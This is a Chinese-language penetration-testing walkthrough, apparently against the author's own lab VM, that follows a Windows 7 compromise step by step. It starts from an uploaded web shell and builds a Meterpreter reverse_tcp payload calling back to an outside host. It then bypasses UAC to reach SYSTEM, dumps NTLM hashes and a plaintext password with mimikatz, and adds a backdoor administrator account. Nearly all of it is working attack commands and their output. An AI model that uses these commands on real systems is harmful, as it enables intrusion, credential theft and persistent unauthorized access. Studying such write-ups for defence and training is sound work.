原文:http://wyb0.com/posts/msf-simple-elevate-privileges/
0x00 前提
獲得了一個shell:http://10.11.11.20/a.php
外網安裝msf的主機:114.115.123.123
0x01 查看主機基本信息
菜刀連接shell,終端執行systeminfo
C:\Apps\phpStudy\WWW\> systeminfo
主機名: REBER-WIN7
OS 名稱: Microsoft Windows 7 專業版
OS 版本: 6.1.7600 ??? Build 7600
OS 制造商: Microsoft Corporation
OS 配置: 獨立服務器
OS 構件類型: Multiprocessor Free
注冊的所有人: reber
注冊的組織:
產品 ID: 00371-868-0000007-85272
初始安裝日期: 2017/12/26, 7:23:00
系統啟動時間: 2018/2/26, 9:52:14
系統制造商: Parallels Software International Inc.
系統型號: Parallels Virtual Platform
系統類型: x64-based PC
處理器: 安裝了 1 個處理器。
[01]: Intel64 Family 6 Model 70 Stepping 1 GenuineIntel ~2495 Mhz
BIOS 版本: Parallels Software International Inc. 12.0.2 (41353), 2016/9/15
Windows 目錄: C:\Windows
系統目錄: C:\Windows\system32
啟動設備: \Device\HarddiskVolume1
系統區域設置: zh-cn;中文(中國)
輸入法區域設置: zh-cn;中文(中國)
時區: (GMT+08:00) 北京
物理內存總量: 4,096 MB
可用的物理內存: 2,897 MB
頁面文件: 最大值: 8,189 MB
頁面文件: 可用: 6,794 MB
頁面文件: 使用中: 1,395 MB
頁面文件位置: C:\pagefile.sys
域: REBER
登錄服務器: \\REBER-WIN7
修補程序: 安裝了 1 個修補程序。
[01]: KB958488
網卡: 安裝了 1 個 NIC。
[01]: Intel(R) PRO/1000 MT Network Connection
連接名: 本地連接 3
啟用 DHCP: 是
DHCP 服務器: 10.11.11.1
IP 地址
[01]: 10.11.11.20
[02]: fe80::d509:b75f:4cc5:5628
0x02 彈出會話到Metasploit
生成payload,然后用菜刀上傳到目標服務器
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=114.115.123.123 LPORT=8888 -f exe -o aa.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: aa.exe
msf監聽,等待payload執行
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 0.0.0.0 yes The listen address
LPORT 8888 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
msf exploit(multi/handler) >
[*] Started reverse TCP handler on 0.0.0.0:8888
msf exploit(multi/handler) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://0.0.0.0:8888
msf exploit(multi/handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(multi/handler) >
通過菜刀執行上傳的aa.exe,菜刀顯示執行錯誤,但是msf已經成功與目標建立了一個會話
msf exploit(multi/handler) >
[*] Sending stage (179779 bytes) to 211.222.222.72
[*] Meterpreter session 1 opened (192.168.0.195:8888 -> 211.222.222.72:34576) at 2018-02-26 12:26:32 +0800
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows REBER-WIN7\reber @ REBER-WIN7 192.168.0.195:8888 -> 211.222.222.72:34576 (10.11.11.20)
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\Users\reber\Desktop
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 73802 fil 2018-02-26 12:02:38 +0800 aa.exe
100666/rw-rw-rw- 282 fil 2017-12-25 15:24:08 +0800 desktop.ini
100666/rw-rw-rw- 9029 fil 2018-02-07 00:14:51 +0800 ftptrace.txt
100666/rw-rw-rw- 108 fil 2018-02-06 23:55:17 +0800 users.dat
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) >
0x03 提權
前面通過systeminfo得知為Win7主機,只有一個補丁,直接嘗試繞過UAC進行提權
msf exploit(multi/handler) > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/local/bypassuac) > options
Module options (exploit/windows/local/bypassuac):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
TECHNIQUE EXE yes Technique to use if UAC is turned off (Accepted: PSH, EXE)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf exploit(windows/local/bypassuac) > set session 1
session => 1
msf exploit(windows/local/bypassuac) > set LHOST 114.115.123.123
LHOST => 114.115.123.123
msf exploit(windows/local/bypassuac) > set LPORT 6666
LPORT => 6666
msf exploit(windows/local/bypassuac) > options
Module options (exploit/windows/local/bypassuac):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
TECHNIQUE EXE yes Technique to use if UAC is turned off (Accepted: PSH, EXE)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 114.115.123.123 yes The listen address
LPORT 6666 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf exploit(windows/local/bypassuac) > run
[-] Handler failed to bind to 114.115.123.123:6666:- -
[*] Started reverse TCP handler on 0.0.0.0:6666
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (179779 bytes) to 211.222.222.72
[*] Meterpreter session 2 opened (192.168.0.195:6666 -> 211.222.222.72:39027) at 2018-02-26 16:29:34 +0800
meterpreter > getuid
Server username: REBER-WIN7\reber
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
0x04 獲得用戶名密碼
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;69053 NTLM REBER-WIN7 reber lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;69036 NTLM REBER-WIN7 reber lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;996 Negotiate REBER REBER-WIN7$ n.s. (Credentials KO)
0;27026 NTLM n.s. (Credentials KO)
0;999 NTLM REBER REBER-WIN7$ n.s. (Credentials KO)
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate REBER REBER-WIN7$
0;27026 NTLM
0;999 NTLM REBER REBER-WIN7$
0;69053 NTLM REBER-WIN7 reber 123456
0;69036 NTLM REBER-WIN7 reber 123456
meterpreter >
0x05 添加用戶
meterpreter > shell
Process 2020 created.
Channel 1 created.
Microsoft Windows [?汾 6.1.7600]
??????? (c) 2009 Microsoft Corporation?????????????
C:\Windows\system32>net user hacker 123456 /add
net user hacker 123456 /add
????????ɡ?
C:\Windows\system32>net localgroup administrators hacker /add
net localgroup administrators hacker /add
????????ɡ?
